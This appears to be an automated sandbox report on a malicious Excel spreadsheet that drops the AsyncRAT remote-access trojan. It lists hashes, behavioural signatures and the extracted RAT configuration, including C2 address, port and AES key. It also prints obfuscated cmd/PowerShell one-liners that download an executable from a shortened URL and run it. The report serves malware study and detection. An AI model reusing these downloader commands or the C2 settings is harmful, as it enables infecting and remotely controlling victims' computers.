Analysis
-
max time kernel
141s -
max time network
146s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
11-11-2020 01:50
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls
Resource
win10v20201028
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls
-
Size
75KB
-
MD5
3ee1d217550d9a55c163425be47b8011
-
SHA1
1bbfcfca3f3825519f9f788e22e44729b8076ead
-
SHA256
e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5
-
SHA512
e3166273eac7e2bce19faabbb8b95e807fd66fa17e29adf3563df2fbbd55af68c2625021ba44070f81e7f600cd8537772457cdd6586c95f464ec011c9308a6b8
Malware Config
Extracted
https://cutt.ly/7gX8MWJ
Extracted
asyncrat
0.5.7B
54.246.188.45:6606
AsyncMutex_6SI8OkPnk
-
aes_key
V4QtIrUXBLtj5uq2coY1jhHCz0hmygkt
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
54.246.188.45
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6606
-
version
0.5.7B
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2260 580 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3704 580 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1372 580 cmd.exe EXCEL.EXE -
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4336-34-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/4336-35-0x000000000040C73E-mapping.dmp asyncrat -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 34 3856 powershell.exe 37 3856 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
as.exepid process 4208 as.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
as.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vlc = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe\"" as.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
as.exedescription pid process target process PID 4208 set thread context of 4336 4208 as.exe RegAsm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 580 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2276 powershell.exe 3856 powershell.exe 3864 powershell.exe 2276 powershell.exe 3856 powershell.exe 3864 powershell.exe 2276 powershell.exe 3856 powershell.exe 3864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeas.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 4208 as.exe Token: SeDebugPrivilege 4336 RegAsm.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE 580 EXCEL.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.exepowershell.exeas.exedescription pid process target process PID 580 wrote to memory of 2260 580 EXCEL.EXE cmd.exe PID 580 wrote to memory of 2260 580 EXCEL.EXE cmd.exe PID 580 wrote to memory of 3704 580 EXCEL.EXE cmd.exe PID 580 wrote to memory of 3704 580 EXCEL.EXE cmd.exe PID 580 wrote to memory of 1372 580 EXCEL.EXE cmd.exe PID 580 wrote to memory of 1372 580 EXCEL.EXE cmd.exe PID 2260 wrote to memory of 3856 2260 cmd.exe powershell.exe PID 2260 wrote to memory of 3856 2260 cmd.exe powershell.exe PID 1372 wrote to memory of 3864 1372 cmd.exe powershell.exe PID 1372 wrote to memory of 3864 1372 cmd.exe powershell.exe PID 3704 wrote to memory of 2276 3704 cmd.exe powershell.exe PID 3704 wrote to memory of 2276 3704 cmd.exe powershell.exe PID 3864 wrote to memory of 4208 3864 powershell.exe as.exe PID 3864 wrote to memory of 4208 3864 powershell.exe as.exe PID 3864 wrote to memory of 4208 3864 powershell.exe as.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe PID 4208 wrote to memory of 4336 4208 as.exe RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\as.exe"C:\Users\Admin\AppData\Roaming\as.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
b346252fc3402a8f9552de980b4d5bf4
SHA1e334a503dcf33f5ce0c80a282f1b73ad596d224b
SHA2561cbdf33258112c4d294618126f4c920436e14a4f1879a00441388bc455556201
SHA512069aa6baca7d77b5d5086922df095b86cef4abac6290d4e2709b6665968fd73b5b264bfc34f744a608ea0a8f54f7418a07d9f5fbc7b398c00e6ad6119e0d789e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
d65056f14ead9bf74b1f977098c70ceb
SHA1c86182f902daf95789571f4a069fc6be41537eac
SHA256406a99286639930c10d3d701625fd1f2f639a670c15516029f5c335c1794abdc
SHA512c41191b43a267d8ebf78c8d967d428a814425c5a9b44d91cc3452eb6dee41ee3b825c90f88536cbe496482535dcc179393edf5b1d52c2cf01d168ccae9da3c36
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
706dac83683779ed367d1aace2cec51f
SHA14ccef33c399cdc8a60a4ee0c655e35ee3d69faa0
SHA256d2367f9187f7c069d69e4f5a354af42ca5b88e3460071facd9cffd77482efb1f
SHA5126cb70e608f8222b9b023197cb000008c195b03e1c9de1dd7f51274efa951152731758b7a629406e018ff9310b58526292ed92e9d3a0c08c56e0ce32499012bdb
-
C:\Users\Admin\AppData\Roaming\as.exeMD5
7af23cd1d1ae577919bf3815d0500aec
SHA162c243e46381a14ea57e4f0e48b26c64506bb1be
SHA25685c7135cf8f3c4d00a3c3a354d153e46aa5ba05574da00d8955a817a7bf8fbd4
SHA5129758c5c1b080f9a3f77017c089d07f0b6f346d7a2c62e6721f2dfe4e7841e938e6fc442d5767824bc806ac06cb1a9b467b6a13797c7364bee7484dd30079bf59
-
C:\Users\Admin\Documents\as.exeMD5
7af23cd1d1ae577919bf3815d0500aec
SHA162c243e46381a14ea57e4f0e48b26c64506bb1be
SHA25685c7135cf8f3c4d00a3c3a354d153e46aa5ba05574da00d8955a817a7bf8fbd4
SHA5129758c5c1b080f9a3f77017c089d07f0b6f346d7a2c62e6721f2dfe4e7841e938e6fc442d5767824bc806ac06cb1a9b467b6a13797c7364bee7484dd30079bf59
-
memory/580-0-0x00007FF91E6F0000-0x00007FF91ED27000-memory.dmpFilesize
6.2MB
-
memory/580-3-0x000001EB591C8000-0x000001EB591CF000-memory.dmpFilesize
28KB
-
memory/580-2-0x000001EB591C8000-0x000001EB591CF000-memory.dmpFilesize
28KB
-
memory/580-1-0x000001EB591C8000-0x000001EB591CF000-memory.dmpFilesize
28KB
-
memory/1372-6-0x0000000000000000-mapping.dmp
-
memory/2260-4-0x0000000000000000-mapping.dmp
-
memory/2276-9-0x0000000000000000-mapping.dmp
-
memory/2276-12-0x00000180FA800000-0x00000180FB1EC000-memory.dmpFilesize
9.9MB
-
memory/2276-13-0x00000180FB4C0000-0x00000180FB4C1000-memory.dmpFilesize
4KB
-
memory/2276-16-0x00000180FB7A0000-0x00000180FB7A1000-memory.dmpFilesize
4KB
-
memory/3704-5-0x0000000000000000-mapping.dmp
-
memory/3856-7-0x0000000000000000-mapping.dmp
-
memory/3856-10-0x000001FA3BEB0000-0x000001FA3C89C000-memory.dmpFilesize
9.9MB
-
memory/3864-8-0x0000000000000000-mapping.dmp
-
memory/3864-11-0x00000207B3430000-0x00000207B3E1C000-memory.dmpFilesize
9.9MB
-
memory/4208-30-0x0000000005370000-0x0000000005371000-memory.dmpFilesize
4KB
-
memory/4208-25-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/4208-26-0x0000000000910000-0x0000000000911000-memory.dmpFilesize
4KB
-
memory/4208-28-0x0000000005900000-0x0000000005901000-memory.dmpFilesize
4KB
-
memory/4208-29-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/4208-22-0x0000000000000000-mapping.dmp
-
memory/4208-31-0x0000000005880000-0x00000000058C2000-memory.dmpFilesize
264KB
-
memory/4208-32-0x00000000077D0000-0x00000000077D1000-memory.dmpFilesize
4KB
-
memory/4208-33-0x0000000007F40000-0x0000000007F56000-memory.dmpFilesize
88KB
-
memory/4336-34-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4336-35-0x000000000040C73E-mapping.dmp
-
memory/4336-36-0x0000000073EC0000-0x00000000745AE000-memory.dmpFilesize
6.9MB
-
memory/4336-39-0x0000000005560000-0x0000000005561000-memory.dmpFilesize
4KB